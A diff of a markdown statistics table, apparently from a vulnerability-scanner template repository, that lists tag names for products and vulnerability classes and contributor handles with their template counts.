| 1 | | | | | | | -| linkerd | 2 | taielab | 1 | | | | | | | -| odoo | 2 | j33n1k4 | 1 | | | | | | | -| intrusive | 2 | bernardo rodrigues | 1 | | | | | | | +| seeyon | 2 | cookiehanhoan | 1 | | | | | | | +| couchdb | 2 | apt-mirror | 1 | | | | | | | +| jellyfin | 2 | absshax | 1 | | | | | | | +| natshell | 2 | akshansh | 1 | | | | | | | +| avantfax | 2 | yavolo | 1 | | | | | | | +| phpcollab | 2 | bolli95 | 1 | | | | | | | +| pega | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| akamai | 2 | regala_ | 1 | | | | | | | +| status | 2 | smaranchand | 1 | | | | | | | +| rockmongo | 2 | daviey | 1 | | | | | | | +| grav | 2 | pratik khalane | 1 | | | | | | | +| mida | 2 | qlkwej | 1 | | | | | | | +| waf | 2 | willd96 | 1 | | | | | | | +| smtp | 2 | j33n1k4 | 1 | | | | | | | +| frp | 2 | affix | 1 | | | | | | | +| vrealize | 2 | petruknisme | 1 | | | | | | | +| spark | 2 | dogasantos | 1 | | | | | | | +| paloalto | 2 | bjhulst | 1 | | | | | | | +| kibana | 2 | intx0x80 | 1 | | | | | | | +| odoo | 2 | hanlaomo | 1 | | | | | | | +| injection | 2 | raesene | 1 | | | | | | | +| jsf | 2 | kareemse1im | 1 | | | | | | | +| jeedom | 2 | johnjhacking | 1 | | | | | | | +| webcam | 2 | notsoevilweasel | 1 | | | | | | | +| hjtcloud | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| cve2007 | 2 | luskabol | 1 | | | | | | | +| chiyu | 2 | sshell | 1 | | | | | | | +| plesk | 2 | patralos | 1 | | | | | | | +| hpe | 2 | luci | 1 | | | | | | | +| rockethchat | 2 | defr0ggy | 1 | | | | | | | +| cve2005 | 2 | ajaysenr | 1 | | | | | | | +| dos | 2 | tim_koopmans | 1 | | | | | | | +| leak | 2 | gboddin | 1 | | | | | | | +| sonarqube | 2 | omarkurt | 1 | | | | | | | +| flir | 2 | schniggie | 1 | | | | | | | +| linkerd | 2 | hakluke | 1 | | | | | | | +| huawei | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| hashicorp | 2 | zandros0 | 1 | | | | | | | +| service | 2 | udyz | 1 | | | | | | | +| openam | 2 | wabafet | 1 | | | | | | | +| exchange | 2 | taielab | 1 | | | | | | | +| glassfish | 2 | idealphase | 1 | | | | | | | +| backdoor | 2 | ahmed sherif | 1 | | | | | | | +| igs | 2 | soyelmago | 1 | | | | | | | +| sonicwall | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| maian | 2 | knassar702 | 1 | | | | | | | +| github | 2 | micha3lb3n | 1 | | | | | | | +| cache | 2 | vzamanillo | 1 | | | | | | | +| mail | 2 | b4uh0lz | 1 | | | | | | | +| rstudio | 2 | s1r1u5_ | 1 | | | | | | | +| ecology | 2 | tirtha_mandal | 1 | | | | | | | +| bigip | 2 | retr0 | 1 | | | | | | | +| jboss | 2 | fmunozs | 1 | | | | | | | +| activemq | 2 | streetofhackerr007 | 1 | | | | | | | +| trixbox | 2 | 0xrod | 1 | | | | | | | +| akkadian | 2 | abison_binoy | 1 | | | | | | | +| emerge | 2 | iampritam | 1 | | | | | | | +| openfire | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| mida | 2 | s1r1u5_ | 1 | | | | | | | -| jellyfin | 2 | tirtha_mandal | 1 | | | | | | | -| saltstack | 2 | aceseven (digisec360) | 1 | | | | | | | -| couchdb | 2 | mubassirpatel | 1 | | | | | | | -| avantfax | 2 | ringo | 1 | | | | | | | -| yapi | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| cve2005 | 2 | jteles | 1 | | | | | | | -| azure | 2 | 0xtavian | 1 | | | | | | | -| github | 2 | mass0ma | 1 | | | | | | | -| sharepoint | 2 | fopina | 1 | | | | | | | -| ucmdb | 2 | shreyapohekar | 1 | | | | | | | -| strapi | 2 | omarkurt | 1 | | | | | | | -| webcam | 2 | raesene | 1 | | | | | | | -| splunk | 2 | mhdsamx | 1 | | | | | | | -| sonarqube | 2 | bernardofsr | 1 | | | | | | | -| leak | 2 | ipanda | 1 | | | | | | | -| grav | 2 | exploitation | 1 | | | | | | | -| sonicwall | 2 | th3.d1p4k | 1 | | | | | | | -| fortios | 2 | kurohost | 1 | | | | | | | -| icewarp | 2 | becivells | 1 | | | | | | | -| phpcollab | 2 | aresx | 1 | | | | | | | -| smb | 2 | udyz | 1 | | | | | | | -| kentico | 2 | kba@sogeti_esec | 1 | | | | | | | -| chamilo | 2 | deena | 1 | | | | | | | -| cve2007 | 2 | pudsec | 1 | | | | | | | -| showdoc | 2 | luci | 1 | | | | | | | -| telerik | 2 | r3naissance | 1 | | | | | | | -| hashicorp | 2 | geraldino2 | 1 | | | | | | | -| dotnet | 1 | akshansh | 1 | | | | | | | -| opensns | 1 | kareemse1im | 1 | | | | | | | -| manageengine | 1 | remonsec | 1 | | | | | | | -| ntopng | 1 | adrianmf | 1 | | | | | | | -| centos | 1 | jeya seelan | 1 | | | | | | | -| nps | 1 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| xvr | 1 | soyelmago | 1 | | | | | | | -| lighttpd | 1 | 0xrod | 1 | | | | | | | -| websvn | 1 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| bash | 1 | vzamanillo | 1 | | | | | | | -| blackboard | 1 | pdp | 1 | | | | | | | -| moinmoin | 1 | ahmed sherif | 1 | | | | | | | -| ssltls | 1 | 0ut0fb4nd | 1 | | | | | | | +| voipmonitor | 2 | adrianmf | 1 | | | | | | | +| nextjs | 2 | aceseven (digisec360) | 1 | | | | | | | +| nagios | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| sharepoint | 2 | dawid czarnecki | 1 | | | | | | | +| guacamole | 2 | 0xteles | 1 | | | | | | | +| strapi | 2 | yashgoti | 1 | | | | | | | +| showdoc | 2 | pdp | 1 | | | | | | | +| horde | 2 | bad5ect0r | 1 | | | | | | | +| idrac | 2 | mah3sec_ | 1 | | | | | | | +| intrusive | 2 | _darrenmartyn | 1 | | | | | | | +| kentico | 2 | th3.d1p4k | 1 | | | | | | | +| saltstack | 2 | johnk3r | 1 | | | | | | | +| fortios | 2 | ldionmarcil | 1 | | | | | | | +| icewarp | 2 | thevillagehacker | 1 | | | | | | | +| prometheus | 2 | _harleo | 1 | | | | | | | +| azure | 2 | sullo | 1 | | | | | | | +| splunk | 2 | furkansenan | 1 | | | | | | | +| keycloak | 2 | mass0ma | 1 | | | | | | | +| chamilo | 2 | co0nan | 1 | | | | | | | +| globalprotect | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| yapi | 2 | chron0x | 1 | | | | | | | +| oauth | 2 | bernardofsr | 1 | | | | | | | +| proxy | 2 | shifacyclewla | 1 | | | | | | | +| wordfence | 2 | nytr0gen | 1 | | | | | | | +| ucmdb | 2 | kurohost | 1 | | | | | | | +| shellshock | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| dolibarr | 2 | mubassirpatel | 1 | | | | | | | +| openstack | 1 | kba@sogeti_esec | 1 | | | | | | | +| jfrog | 1 | andirrahmani1 | 1 | | | | | | | +| blind | 1 | ipanda | 1 | | | | | | | +| bash | 1 | elder tao | 1 | | | | | | | +| npm | 1 | whynotke | 1 | | | | | | | +| gogs | 1 | _c0wb0y_ | 1 | | | | | | | +| gloo | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| zarafa | 1 | ooooooo_q | 1 | | | | | | | +| zzzcms | 1 | its0x08 | 1 | | | | | | | +| ec2 | 1 | toufik airane | 1 | | | | | | | +| cherokee | 1 | @github.com/defr0ggy | 1 | | | | | | | +| k8s | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | | tika | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | | checkpoint | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | | oscommerce | 1 | | | | | | | | | | eyou | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | | finereport | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | | javafaces | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | | db | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | | rubedo | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | | emc | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | | floc | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| prestashop | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| visualtools | 1 | | | | | 